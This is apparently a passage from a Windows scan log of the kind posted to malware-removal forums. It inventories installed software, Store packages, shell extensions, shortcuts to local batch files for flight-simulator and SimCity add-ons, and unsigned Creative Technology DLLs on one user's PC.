Traffic Simulator Configuration Tool (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Traffic Simulator Configuration Tool) (Version:  - )
TypeScript SDK (HKLM-x32\...\{3CBDDAE8-99AE-4168-BDA7-8352BF15BE73}) (Version: 3.1.2.0 - Microsoft Corporation) Hidden
TypeScript SDK (HKLM-x32\...\{CFA1F87E-EF2B-4785-812C-4BEEA22CFD06}) (Version: 2.3.5.0 - Microsoft Corporation) Hidden
UltraSearch V2.3 (64 bit) (HKLM\...\UltraSearch_is1) (Version: 2.3 - JAM Software)
Unity (HKLM-x32\...\Unity) (Version: 5.6.3p1 - Unity Technologies ApS)
Universal CRT Extension SDK (HKLM-x32\...\{1FBCBC17-4527-2340-0832-B1D49C41FF67}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{7D225043-6CC5-7B56-11DD-AFF90E4C1C0C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{BE2D1829-B45D-4D78-BF02-4076B86AC57C}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{8BFBEC30-33CC-13B4-849F-3B036F27466A}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{A46D1F7A-BA32-2375-EF97-4975E594A7E7}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{CB19DBA2-C210-5646-9522-695A1317CD34}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{413A1F9C-9349-4847-610E-BAB177A48ADE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{5F577A45-3C65-352B-061D-D6A57F05402C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{3B588BBE-EB02-D1B2-5CD5-7DB85AD8A3E7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{D2DC1EDF-EE04-9B5F-BDD7-06645D859EC3}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{CE83D0BD-418A-F3D1-D6CE-687E96D1EBD0}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{E2EA2702-534B-D6C1-5AC4-724E3CE7B2D9}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal Patch Finder version 1.5 (HKLM-x32\...\{88FBB3D2-C9A5-41E4-88B8-3F4F1722E7D1}_is1) (Version: 1.5 - Hypercube Softwares)
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{9C4F3AF4-21D8-43BD-A69C-517BB96012CF}) (Version: 2.12.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM-x32\...\{B302EECB-0DA5-46E6-8A58-127440F22CF1}) (Version: 1.7.0.0 - Microsoft Corporation) Hidden
VBSBeautifier (remove only) (HKLM-x32\...\VBSBeautifier) (Version:  - )
vcpp_crt.redist.clickonce (HKLM-x32\...\{253D6AD3-5786-4B3B-B4E1-E082482A1F26}) (Version: 14.16.27033 - Microsoft Corporation) Hidden
VeraCrypt (HKLM-x32\...\VeraCrypt) (Version: 1.21 - IDRIX)
Viber (HKLM-x32\...\{32AF88A9-E104-4306-8B68-CB92FFD2CAD6}) (Version: 11.0.0.42 - Viber Media S.a.r.l) Hidden
Viber (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\{9097b5b3-1f2b-4ff7-a350-97a76bb76fb8}) (Version: 11.0.0.42 - Viber Media S.a.r.l)
Visual Studio Community 2017 (HKLM-x32\...\fba7c5bd) (Version: 15.9.28307.905 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
VoiceBot 3.0 (HKLM-x32\...\2BB5202A-885B-454F-8624-FD3310CD3225_is1) (Version: 3.0.0.0 - Binary Fortress Software)
VS Immersive Activate Helper (HKLM-x32\...\{54FBC9A9-CCA1-417E-ACA6-203A32A39F37}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS JIT Debugger (HKLM\...\{4B816AD0-D12B-498A-8148-7CBE3ED328DE}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS Script Debugging Common (HKLM\...\{8B657335-3813-4CF4-A6FE-2AA44BE23F94}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
vs_BlendMsi (HKLM-x32\...\{C5D83E0F-12E7-4BA3-98E6-DAE0E73B5BF9}) (Version: 15.0.27205 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsi (HKLM-x32\...\{A68D7884-F036-4A0D-AE1A-410E0311E135}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsires (HKLM-x32\...\{91DDDFB5-1782-48C2-BA2A-8F4D9DE39D27}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncesigntoolmsi (HKLM-x32\...\{6A1ECF65-2CBF-4B33-9D4A-D1C0A0E5FE45}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_communitymsi (HKLM-x32\...\{71797C29-380A-492C-B35A-F5E4A7B57BDC}) (Version: 15.9.28307 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{40040E64-50EB-4FCF-B209-DA0B20821759}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{BFFA2FFB-1095-4ADD-A352-368806D2412B}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{A254DA0E-26A1-43C3-95BE-7A24D5599473}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{1F42A73E-CF26-4D67-BA79-752CA56B639F}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{A41E138F-5A3F-443C-B72D-957AB994FB5A}) (Version: 15.9.28128 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx64 (HKLM\...\{B6BAC9A6-A70D-4E4D-B90A-7EE2B336E090}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx86 (HKLM-x32\...\{3161DA68-DD37-4798-82DB-B3A0BD6BA233}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{3A78DA3D-C8D4-429D-B536-6E59A0088451}) (Version: 15.8.27825 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{68B8AD33-CE97-4C3D-9583-669C39D21BA5}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{6DFE6F8D-B61D-4348-AB70-4ABF1210DFD5}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_SQLClickOnceBootstrappermsi (HKLM-x32\...\{5779B6DD-604A-41CE-BC3D-9D4BDDA22AD2}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_tipsmsi (HKLM-x32\...\{1AC6CC3D-7724-4D84-9270-798A2191AB1C}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
Weka 3.8.3 (HKLM\...\Weka 3.8.3) (Version: 3.8.3 - Machine Learning Group, University of Waikato, Hamilton, NZ)
WinAppDeploy (HKLM-x32\...\{03343DEA-224B-E9B6-1FBB-E637E6BC6BAA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinAppDeploy (HKLM-x32\...\{716AE8F2-1BE3-7657-DF6B-F23DEEC75AF9}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinAutomation (HKLM\...\{67F5E390-8E09-4AE4-B7F2-705AFD23D86D}) (Version: 6.0.2.4227 - Softomotive Ltd) Hidden
WinAutomation (HKLM-x32\...\WinAutomation) (Version: 6.0.2.4227 - Softomotive Ltd)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22211 - Microsoft Corporation)
Windows SDK AddOn (HKLM-x32\...\{E1C6F438-7C50-41F5-8B47-3CC96D397CA3}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version:  - )
Windows Software Development Kit - Windows 10.0.15063.674 (HKLM-x32\...\{6824cee4-b358-4633-b82c-5f20894af8e2}) (Version: 10.1.15063.674 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.17763.132 (HKLM-x32\...\{5fe95b9d-9219-4d8b-a031-71323ae48a81}) (Version: 10.1.17763.132 - Microsoft Corporation)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{00B12DF9-5428-9406-DE2C-8E8A1A062B05}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{D8AA52A2-81E2-BB84-AAF9-C487C586CC15}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{5715A2A6-E637-81E3-464D-3F0F999E506A}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{E82A4A6C-C21C-35FE-B805-3E44318F6D63}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{2B8614A6-D0C1-CFE0-9311-7AF9227DC9BA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{7E898893-9C42-A572-7F57-FDE55CE812F7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{409D68FF-37DD-F8F4-A60F-30BEAA4AA4CE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{E8B1CB29-5C24-D882-3CEF-F8A7263BC63D}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{F6F11150-93DE-0507-FCA0-F746E0207017}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{3617F573-CF51-0F5A-063F-B272F98D0522}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{8329C3A0-8582-D1C2-67FF-800654BFDF45}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{771C9DEF-7C0B-85DA-6426-7A20F06BEC94}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{FDE59EF8-D43D-F9DA-5B0C-CC9C90DB0335}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{87CC4887-0873-F87B-D804-6A78B07DC1F5}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{B047C746-63E8-41C7-A5C0-7ABD390CF3E6}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{0063AF94-397B-9C64-1C71-D404B27C5D96}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{D62E0DD5-9853-C09C-AE15-D02988503C60}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
wxWidgets 3.0.4 (HKLM-x32\...\wxWidgets_is1) (Version:  - wxWidgets)
X-Mouse Button Control 2.18.8 (HKLM-x32\...\X-Mouse Button Control) (Version: 2.18.8 - Highresolution Enterprises)
ZBrush 4R7 (HKLM-x32\...\ZBrush 4R7 4R7) (Version: 4R7 - Pixologic)

Packages:
=========
Mail and Calendar -> C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12228.20206.0_x64__8wekyb3d8bbwe [2019-11-20] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad]
Microsoft News -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.33.13094.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation) [MS Ad]
Microsoft Phone Companion -> C:\Program Files\WindowsApps\Microsoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe [2018-11-13] (Microsoft Corporation)
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.11052.0_x64__8wekyb3d8bbwe [2019-11-10] (Microsoft Studios) [MS Ad]
MSN Money -> C:\Program Files\WindowsApps\Microsoft.BingFinance_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad]
MSN Sports -> C:\Program Files\WindowsApps\Microsoft.BingSports_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad]
MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.33.13253.0_x64__8wekyb3d8bbwe [2019-11-23] (Microsoft Corporation) [MS Ad]
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{23066764-9BDD-4FBD-8B1F-F4547CF2684F}\InprocServer32 -> C:\Users\SR\AppData\Local\Microsoft\OneDrive\18.070.0405.0002\amd64\FileSyncShell64.dll => No File
CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{E31EA727-12ED-4702-820C-4B6445F28E1A} -> [Dropbox] => C:\Users\SR\Dropbox [2018-01-03 12:23]
ShellIconOverlayIdentifiers: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers-x32: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ContextMenuHandlers1: [AESCrypt] -> {35872D53-3BD4-45FA-8DB5-FFC47D4235E7} => C:\Program Files\AESCrypt\AESCrypt.dll [2015-04-17] (Packetizer, Inc.) [File not signed]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2018-07-23] (Notepad++ -> )
ContextMenuHandlers1: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => C:\Program Files\PDFCreator\PDFCreatorShell.DLL [2017-01-31] (pdfforge GmbH -> pdfforge GmbH)
ContextMenuHandlers1: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} =>  -> No File
ContextMenuHandlers5: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\SR\Desktop\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maxis\SimCity 4\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_AlpesNordBP.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_AlpesNordBP.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_SUMMER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_SUMMER.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_WINTER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_WINTER.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Summer.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_SummerBasePack.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Winter.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Summer.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_SummerBasePack.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Winter.bat ()

==================== Loaded Modules (Whitelisted) =============

2009-02-23 12:28 - 2009-02-23 12:28 - 000013824 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctagent.DLL
2009-02-23 12:27 - 2009-02-23 12:27 - 000175104 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDCIFCE.DLL
2009-02-23 12:16 - 2009-02-23 12:16 - 000067584 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDPROXY.DLL
2009-02-23 12:28 - 2009-02-23 12:28 - 000061952 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctpcmcia.DLL
2009-02-23 12:28 - 2009-02-23 12:28 - 000046592 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctspkhlp.DLL
2016-12-07 20:44 - 2016-12-07 20:44 - 000373248 _____ (IntelleSoft) [File not signed] C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\BugTrapU-x64.dll
